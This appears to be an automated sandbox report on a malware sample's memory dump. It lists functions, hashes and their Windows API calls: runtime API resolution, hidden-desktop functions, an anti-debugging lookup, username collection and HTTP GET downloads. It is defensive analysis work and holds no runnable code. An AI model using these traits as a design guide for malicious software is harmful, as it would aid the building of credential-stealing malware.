
Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
Instruction ID: 7b5cedaa0e73423a59cdd3f572970276683dffd84f65f372ce21167b4aa31ce5
Opcode Fuzzy Hash: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
Instruction Fuzzy Hash: E0A16DB9A117009FD758DF65EE88A6637BBF789344300A51EF94683364DBB4A900DFB0

Function 004229E0 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00422A0F
HeapAlloc.KERNEL32(00000000), ref: 00422A16
GetUserNameA.ADVAPI32(00000000,00000104), ref: 00422A2A

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 8d99d318415601690ae838a51b87a7364d012be2201e373feb9efb6fa8a950a4
Instruction ID: aa6ded6259508bede27090f4c861d2ca31da26e1ef70df7e495680ac72f078f7
Opcode Fuzzy Hash: 8d99d318415601690ae838a51b87a7364d012be2201e373feb9efb6fa8a950a4
Instruction Fuzzy Hash: 95F054B1A44614AFD710DF98DD49B9ABBBCF744B65F10021AF915E3680D7B419048BE1

Function 00426710 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,00A14148), ref: 00426725
GetProcAddress.KERNEL32(74DD0000,00A14048), ref: 0042673D
GetProcAddress.KERNEL32(74DD0000,00A3A590), ref: 00426756
GetProcAddress.KERNEL32(74DD0000,00A3A620), ref: 0042676E
GetProcAddress.KERNEL32(74DD0000,00A3A5C0), ref: 00426786
GetProcAddress.KERNEL32(74DD0000,00A3A5D8), ref: 0042679F
GetProcAddress.KERNEL32(74DD0000,00A18C68), ref: 004267B7
GetProcAddress.KERNEL32(74DD0000,00A3A5F0), ref: 004267CF
GetProcAddress.KERNEL32(74DD0000,00A3A650), ref: 004267E8
GetProcAddress.KERNEL32(74DD0000,00A3A608), ref: 00426800
GetProcAddress.KERNEL32(74DD0000,00A3DD40), ref: 00426818
GetProcAddress.KERNEL32(74DD0000,00A14068), ref: 00426831
GetProcAddress.KERNEL32(74DD0000,00A14228), ref: 00426849
GetProcAddress.KERNEL32(74DD0000,00A142A8), ref: 00426861
GetProcAddress.KERNEL32(74DD0000,00A142C8), ref: 0042687A
GetProcAddress.KERNEL32(74DD0000,00A3DC38), ref: 00426892
GetProcAddress.KERNEL32(74DD0000,00A3DDB8), ref: 004268AA
GetProcAddress.KERNEL32(74DD0000,00A18EE8), ref: 004268C3
GetProcAddress.KERNEL32(74DD0000,00A140C8), ref: 004268DB
GetProcAddress.KERNEL32(74DD0000,00A3DC80), ref: 004268F3
GetProcAddress.KERNEL32(74DD0000,00A3DCC8), ref: 0042690C
GetProcAddress.KERNEL32(74DD0000,00A3DAE8), ref: 00426924
GetProcAddress.KERNEL32(74DD0000,00A3DC20), ref: 0042693C
GetProcAddress.KERNEL32(74DD0000,00A14128), ref: 00426955
GetProcAddress.KERNEL32(74DD0000,00A3DD70), ref: 0042696D
GetProcAddress.KERNEL32(74DD0000,00A3DCE0), ref: 00426985
GetProcAddress.KERNEL32(74DD0000,00A3DB78), ref: 0042699E
GetProcAddress.KERNEL32(74DD0000,00A3DC08), ref: 004269B6
GetProcAddress.KERNEL32(74DD0000,00A3DC50), ref: 004269CE
GetProcAddress.KERNEL32(74DD0000,00A3DB00), ref: 004269E7
GetProcAddress.KERNEL32(74DD0000,00A3DD28), ref: 004269FF
GetProcAddress.KERNEL32(74DD0000,00A3DD88), ref: 00426A17
GetProcAddress.KERNEL32(74DD0000,00A3DCB0), ref: 00426A30
GetProcAddress.KERNEL32(74DD0000,00A18720), ref: 00426A48
GetProcAddress.KERNEL32(74DD0000,00A3DB30), ref: 00426A60
GetProcAddress.KERNEL32(74DD0000,00A3DB48), ref: 00426A79
GetProcAddress.KERNEL32(74DD0000,00A142E8), ref: 00426A91
GetProcAddress.KERNEL32(74DD0000,00A3DB60), ref: 00426AA9
GetProcAddress.KERNEL32(74DD0000,00A14368), ref: 00426AC2
GetProcAddress.KERNEL32(74DD0000,00A3DB18), ref: 00426ADA
GetProcAddress.KERNEL32(74DD0000,00A3DB90), ref: 00426AF2
GetProcAddress.KERNEL32(74DD0000,00A141E8), ref: 00426B0B
GetProcAddress.KERNEL32(74DD0000,00A14308), ref: 00426B23
LoadLibraryA.KERNEL32(00A3DDA0,0042067A), ref: 00426B35
LoadLibraryA.KERNEL32(00A3DAD0), ref: 00426B46
LoadLibraryA.KERNEL32(00A3DBA8), ref: 00426B58
LoadLibraryA.KERNEL32(00A3DC68), ref: 00426B6A
LoadLibraryA.KERNEL32(00A3DD10), ref: 00426B7B
LoadLibraryA.KERNEL32(00A3DBC0), ref: 00426B8D
LoadLibraryA.KERNEL32(00A3DC98), ref: 00426B9F
LoadLibraryA.KERNEL32(00A3DD58), ref: 00426BB0
GetProcAddress.KERNEL32(75290000,00A14328), ref: 00426BCC
GetProcAddress.KERNEL32(75290000,00A3DBD8), ref: 00426BE4
GetProcAddress.KERNEL32(75290000,00A3AC50), ref: 00426BFD
GetProcAddress.KERNEL32(75290000,00A3DBF0), ref: 00426C15
GetProcAddress.KERNEL32(75290000,00A14488), ref: 00426C2D
GetProcAddress.KERNEL32(6FC70000,00A18B00), ref: 00426C4D
GetProcAddress.KERNEL32(6FC70000,00A14568), ref: 00426C65
GetProcAddress.KERNEL32(6FC70000,00A18BA0), ref: 00426C7E
GetProcAddress.KERNEL32(6FC70000,00A3DCF8), ref: 00426C96
GetProcAddress.KERNEL32(6FC70000,00A3DE18), ref: 00426CAE
GetProcAddress.KERNEL32(6FC70000,00A14788), ref: 00426CC7
GetProcAddress.KERNEL32(6FC70000,00A14768), ref: 00426CDF
GetProcAddress.KERNEL32(6FC70000,00A3DE00), ref: 00426CF7
GetProcAddress.KERNEL32(752C0000,00A144E8), ref: 00426D13
GetProcAddress.KERNEL32(752C0000,00A14528), ref: 00426D2B
GetProcAddress.KERNEL32(752C0000,00A3DE48), ref: 00426D44
GetProcAddress.KERNEL32(752C0000,00A3DE30), ref: 00426D5C
GetProcAddress.KERNEL32(752C0000,00A14748), ref: 00426D74
GetProcAddress.KERNEL32(74EC0000,00A18C40), ref: 00426D94
GetProcAddress.KERNEL32(74EC0000,00A18C90), ref: 00426DAC
GetProcAddress.KERNEL32(74EC0000,00A3DE60), ref: 00426DC5
GetProcAddress.KERNEL32(74EC0000,00A14448), ref: 00426DDD
GetProcAddress.KERNEL32(74EC0000,00A144A8), ref: 00426DF5
GetProcAddress.KERNEL32(74EC0000,00A18D30), ref: 00426E0E
GetProcAddress.KERNEL32(75BD0000,00A3DE78), ref: 00426E2E
GetProcAddress.KERNEL32(75BD0000,00A14508), ref: 00426E46
GetProcAddress.KERNEL32(75BD0000,00A3AC10), ref: 00426E5F
GetProcAddress.KERNEL32(75BD0000,00A3DE90), ref: 00426E77
GetProcAddress.KERNEL32(75BD0000,00A3DDD0), ref: 00426E8F
GetProcAddress.KERNEL32(75BD0000,00A14548), ref: 00426EA8
GetProcAddress.KERNEL32(75BD0000,00A14588), ref: 00426EC0
GetProcAddress.KERNEL32(75BD0000,00A3DDE8), ref: 00426ED8
GetProcAddress.KERNEL32(75BD0000,00A3DF98), ref: 00426EF1
GetProcAddress.KERNEL32(75BD0000,CreateDesktopA), ref: 00426F07
GetProcAddress.KERNEL32(75BD0000,OpenDesktopA), ref: 00426F1E
GetProcAddress.KERNEL32(75BD0000,CloseDesktop), ref: 00426F35
GetProcAddress.KERNEL32(75A70000,00A144C8), ref: 00426F51
GetProcAddress.KERNEL32(75A70000,00A3E118), ref: 00426F69
GetProcAddress.KERNEL32(75A70000,00A3DF08), ref: 00426F82
GetProcAddress.KERNEL32(75A70000,00A3E100), ref: 00426F9A
GetProcAddress.KERNEL32(75A70000,00A3DED8), ref: 00426FB2
GetProcAddress.KERNEL32(75450000,00A146A8), ref: 00426FCE
GetProcAddress.KERNEL32(75450000,00A14648), ref: 00426FE6
GetProcAddress.KERNEL32(75DA0000,00A14688), ref: 00427002
GetProcAddress.KERNEL32(75DA0000,00A3DEF0), ref: 0042701A
GetProcAddress.KERNEL32(6F070000,00A145C8), ref: 0042703A
GetProcAddress.KERNEL32(6F070000,00A14468), ref: 00427052
GetProcAddress.KERNEL32(6F070000,00A147A8), ref: 0042706B
GetProcAddress.KERNEL32(6F070000,00A3E0E8), ref: 00427083
GetProcAddress.KERNEL32(6F070000,00A145A8), ref: 0042709B
GetProcAddress.KERNEL32(6F070000,00A145E8), ref: 004270B4
GetProcAddress.KERNEL32(6F070000,00A14608), ref: 004270CC
GetProcAddress.KERNEL32(6F070000,00A14628), ref: 004270E4
GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 004270FB
GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00427112
GetProcAddress.KERNEL32(75AF0000,00A3E130), ref: 0042712E
GetProcAddress.KERNEL32(75AF0000,00A3AC20), ref: 00427146
GetProcAddress.KERNEL32(75AF0000,00A3E0B8), ref: 0042715F
GetProcAddress.KERNEL32(75AF0000,00A3DF38), ref: 00427177
GetProcAddress.KERNEL32(75D90000,00A14668), ref: 00427193
GetProcAddress.KERNEL32(6C510000,00A3DF50), ref: 004271AF
GetProcAddress.KERNEL32(6C510000,00A146C8), ref: 004271C7
GetProcAddress.KERNEL32(6C510000,00A3DF68), ref: 004271E0
GetProcAddress.KERNEL32(6C510000,00A3E148), ref: 004271F8

Strings

InternetSetOptionA, xrefs: 004270F0
CloseDesktop, xrefs: 00426F2A
OpenDesktopA, xrefs: 00426F13
HttpQueryInfoA, xrefs: 00427107
CreateDesktopA, xrefs: 00426F01

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
API String ID: 2238633743-3468015613
Opcode ID: d9010518685dbd8149d20af063d7a7bd964621f9488924b3e0d9ff76a134a9d7
Instruction ID: b02b475b7c59bcec4fa92d45c25333ea948ef94e2fcc8a3fd8fff9104c503747
Opcode Fuzzy Hash: d9010518685dbd8149d20af063d7a7bd964621f9488924b3e0d9ff76a134a9d7
Instruction Fuzzy Hash: 29625EB9A103009FD758DF65ED88AA637BBF789345300A91DF95683364DBB4A800DFB0

Function 0041F300 Relevance: 104.4, APIs: 57, Strings: 2, Instructions: 1164stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0042D01C,00000001,00000000,00000000), ref: 0041F32E
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F34C
lstrlenA.KERNEL32(0042D01C), ref: 0041F357
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F371
lstrlenA.KERNEL32(0042D01C), ref: 0041F37C
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F396
lstrcpy.KERNEL32(00000000,00435564), ref: 0041F3BE
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F3EC
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F422
lstrcpy.KERNEL32(00000000,0042D01C), ref: 0041F454
lstrlenA.KERNEL32(00A140A8), ref: 0041F476
lstrcpy.KERNEL32(00000000,?), ref: 0041F506
lstrcpy.KERNEL32(00000000,00000000), ref: 0041F52B
lstrcpy.KERNEL32(00000000,00000000), ref: 0041F5E2
StrCmpCA.SHLWAPI(?,ERROR), ref: 0041F894
lstrlenA.KERNEL32(00A3AD00), ref: 0041F8C2
lstrcpy.KERNEL32(00000000,00A3AD00), ref: 0041F8EF
lstrcpy.KERNEL32(00000000,00000000), ref: 0041F912
lstrcpy.KERNEL32(00000000,?), ref: 0041F966
lstrcpy.KERNEL32(00000000,00A3AD00), ref: 0041FA28
lstrcpy.KERNEL32(00000000,00A3ABF0), ref: 0041FA58
lstrcpy.KERNEL32(00000000,?), ref: 0041FAB7
StrCmpCA.SHLWAPI(?,ERROR), ref: 0041FBD5
lstrlenA.KERNEL32(00402E3E), ref: 0041FC03
lstrcpy.KERNEL32(00000000,00402E3E), ref: 0041FC30
lstrcpy.KERNEL32(00000000,00000000), ref: 0041FC53
lstrcpy.KERNEL32(00000000,?), ref: 0041FCA7

Strings

>.@, xrefs: 0041FBFB, 0041FD3A
ERROR, xrefs: 0041F788, 0041F88E, 0041FB30, 0041FBCF, 0041FE70, 0041FF0F

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: >.@$ERROR
API String ID: 367037083-1486603279
Opcode ID: 9904dda6127f26a323bbc236357e09c9ee1fe5f73f385f90d1b19d1ae4a564e2
Instruction ID: cc5225f4657195739226e2497bd3095dc8a2c9716357749900c22e5d1458564d
Opcode Fuzzy Hash: 9904dda6127f26a323bbc236357e09c9ee1fe5f73f385f90d1b19d1ae4a564e2
Instruction Fuzzy Hash: 3CA26D70A017028FC720DF25D948A5BBBE5AF44304F18857EE8499B3A1DB79DC86CF99

Function 004056C0 Relevance: 98.7, APIs: 51, Strings: 5, Instructions: 734
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpy.KERNEL32(00000000,?), ref: 004056EF
lstrlenA.KERNEL32(?), ref: 00405742
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00405784
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004057C3
lstrcpy.KERNEL32(00000000,0042D01C), ref: 004057F3
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00405828

Strings

------, xrefs: 00405929, 00405956
", xrefs: 00405BA4, 00405C92, 00405D80
--, xrefs: 0040598F, 004059B7
------, xrefs: 00405B0B, 00405BFC, 00405CEA
~A, xrefs: 0040576C, 00405FEA, 00405E90

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: ------$"$--$------$~A
API String ID: 367037083-2106860866
Opcode ID: 3ae760454baa2433a10e4dfb7c9e6bd38ce3ae5d14960ce0b0a08ccdc03736b0
Instruction ID: 212b4b6a8a6c145a7523e110c63bb65051ea1ed7585ae654da97c7ff09dcb277
Opcode Fuzzy Hash: 3ae760454baa2433a10e4dfb7c9e6bd38ce3ae5d14960ce0b0a08ccdc03736b0
Instruction Fuzzy Hash: 20426A71E006199BCB10EBB5DD89A9F77B5AF04304F44502AF905B72A1DB78ED028FE8

Function 00418D00 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 174
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpCA.SHLWAPI(?,block,?,?,?,?,0042081F), ref: 00418D1A
ExitProcess.KERNEL32 ref: 00418D27
strtok_s.MSVCRT ref: 00418D39

Strings

block, xrefs: 00418D0B

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: 2b5693eeba8fd220ac83beb12232b21ebf595c586142cf98576af706eac3d5ba
Instruction ID: d61f0b7eaf725463d85374e156b8a22592a45d2bf89fa87c178f2814d4d341aa
Opcode Fuzzy Hash: 2b5693eeba8fd220ac83beb12232b21ebf595c586142cf98576af706eac3d5ba
Instruction Fuzzy Hash: 675160B1A047019FC7209F75EC88AAB77F6EB48704B10582FE452D7660DBBCD4828F69

Function 00406B80 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpy.KERNEL32(00000000,?), ref: 00406BAF
lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406C02
InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 00406C15
StrCmpCA.SHLWAPI(?,00A3FF70), ref: 00406C2D
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406C55
HttpOpenRequestA.WININET(00000000,GET,?,00A3F518,00000000,00000000,-00400100,00000000), ref: 00406C90
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406CB7
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406CC6
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406CE5
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00406D3F
lstrcpy.KERNEL32(00000000,?), ref: 00406D9B
InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00406DBD
InternetCloseHandle.WININET(00000000), ref: 00406DCE
InternetCloseHandle.WININET(?), ref: 00406DD8
InternetCloseHandle.WININET(00000000), ref: 00406DE2
lstrcpy.KERNEL32(00000000,00000000), ref: 00406E03

Strings

GET, xrefs: 00406C8A
ERROR, xrefs: 00406CF2

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
